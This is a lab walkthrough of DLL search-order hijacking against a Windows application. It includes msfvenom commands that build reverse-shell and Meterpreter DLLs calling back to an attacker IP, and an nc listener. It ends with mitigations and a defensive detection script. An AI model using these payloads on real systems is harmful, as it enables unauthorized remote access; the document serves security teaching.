Overview

This technical walkthrough demonstrates DLL injection techniques in a controlled lab environment. The demonstration aims to illustrate the security implications of downloading and executing software from untrusted sources. Through practical examples, we’ll explore how malicious actors can leverage DLL search order hijacking to gain unauthorized system access.

DLL Search Order Fundamentals

Standard Search Order

[Figure: Standard DLL Search Order]

SafeDLLSearchMode Enabled

[Figure: Safe DLL Search Mode]

Lab Environment Setup

Components

  1. Target Application

  2. Virtual Machines

    • Windows 10 (Target System)
    • Kali Linux (Attack System)

DLL Hijacking Analysis

Process Monitor Configuration

  1. Launch Process Monitor as Administrator

  2. Configure filters for DLL monitoring [Figure: Process Monitor Configuration]

  3. Verify clean monitoring state [Figure: Clean Process Monitor]

Identifying Vulnerable DLLs

  1. Execute target application [Figure: Initial Execution Analysis]

  2. Identified vulnerable DLL:

    • Target: kavremoverENU.dll
    • Characteristics: Non-crashing execution with minimal user impact

[Figure: Vulnerable DLL Identification]

Exploitation Technique

Payload Generation

Basic Reverse Shell

# Generate reverse shell DLL
msfvenom -p windows/shell_reverse_tcp \
    LHOST=172.16.101.198 \
    LPORT=443 \
    EXITFUNC=thread \
    -f dll \
    -e x86/shikata_ga_nai \
    -o kavremoverENU.dll

Advanced Meterpreter Payload

# Generate Meterpreter DLL
msfvenom -p windows/meterpreter/reverse_tcp \
    LHOST=172.16.101.198 \
    LPORT=443 \
    -f dll \
    -o msi.dll

[Figure: Payload Generation]

Payload Deployment

  1. Copy malicious DLL to target directory [Figure: Payload Deployment]

  2. Establish listener on attack system:

nc -lvnp 443

[Figure: Listener Setup]

Execution Analysis

  1. Initial Shell Access [Figure: Shell Access]

  2. Process Monitor Analysis:

    • Observed rundll32.exe execution
    • Confirmed successful DLL injection

[Figure: Process Analysis]

Alternative Injection Points

MSI DLL Hijacking

  • Target: msi.dll
  • Injection Point: Post-EULA acceptance
  • Advantage: More seamless user experience

[Figure: MSI DLL Hijacking]

Security Implications

  1. Application Trust

    • Demonstrates risks of executing untrusted software
    • Highlights importance of code signing
  2. DLL Search Order

    • Shows vulnerability in Windows DLL loading mechanism
    • Emphasizes need for secure application deployment
  3. Defense Strategies

    • Use of SafeDLLSearchMode
    • Application directory security
    • System-wide DLL security policies

Mitigation Strategies

  1. Developer Recommendations

    • Use absolute paths for DLL loading
    • Implement DLL signature verification
    • Bundle required DLLs with application
  2. System Administrator Guidelines

    • Maintain strict folder permissions
    • Enable Windows Defender features
    • Monitor for suspicious DLL loading
  3. User Best Practices

    • Download from trusted sources
    • Verify application signatures
    • Monitor system behavior changes
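A defender-side check for the "Monitor for suspicious DLL loading" item, added here as an example that is not part of the original walkthrough: it scans Sysmon-style image-load records (Image, ImageLoaded, Signed fields) and flags the two load patterns this lab produces, a system DLL name such as msi.dll resolved outside the system directory, and an unsigned DLL loaded from the user-writable folder the application itself runs from. The sample records, the process name target.exe and the small SYSTEM_DLLS list are constructed assumptions.

```python
"""Flag DLL search-order hijack indicators in Sysmon-style image-load records."""
import csv
import io
import ntpath  # handles Windows paths correctly on any host

# Constructed sample records (Sysmon Event ID 7 fields), not real telemetry.
SAMPLE_EVENTS = r"""Image,ImageLoaded,Signed
C:\Windows\System32\rundll32.exe,C:\Windows\System32\msi.dll,true
C:\Users\lab\Downloads\target.exe,C:\Users\lab\Downloads\kavremoverENU.dll,false
C:\Users\lab\Downloads\target.exe,C:\Users\lab\Downloads\msi.dll,false
C:\Program Files\App\app.exe,C:\Windows\System32\kernel32.dll,true
"""

# DLL names a clean system resolves from the system directory; a copy loaded
# from anywhere else is a search-order hijack indicator. Assumed short list.
SYSTEM_DLLS = {"msi.dll", "version.dll", "kernel32.dll"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("c:\\users\\", "c:\\temp\\")


def is_under(path, prefixes):
    """Case-insensitive prefix test for Windows paths."""
    lowered = path.lower()
    return any(lowered.startswith(prefix) for prefix in prefixes)


def analyze(csv_text):
    """Return [(dll_path, reason)] for every record that warrants an alert."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text.strip())):
        dll, exe = row["ImageLoaded"], row["Image"]
        name = ntpath.basename(dll).lower()
        signed = row["Signed"].strip().lower() == "true"
        same_dir = ntpath.dirname(dll).lower() == ntpath.dirname(exe).lower()
        if name in SYSTEM_DLLS and not is_under(dll, SYSTEM_DIRS):
            findings.append((dll, "system DLL name loaded outside the system directory"))
        elif not signed and same_dir and is_under(dll, USER_WRITABLE):
            findings.append((dll, "unsigned DLL loaded from user-writable application directory"))
    return findings


if __name__ == "__main__":
    for path, reason in analyze(SAMPLE_EVENTS):
        print(f"ALERT {path}: {reason}")
```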
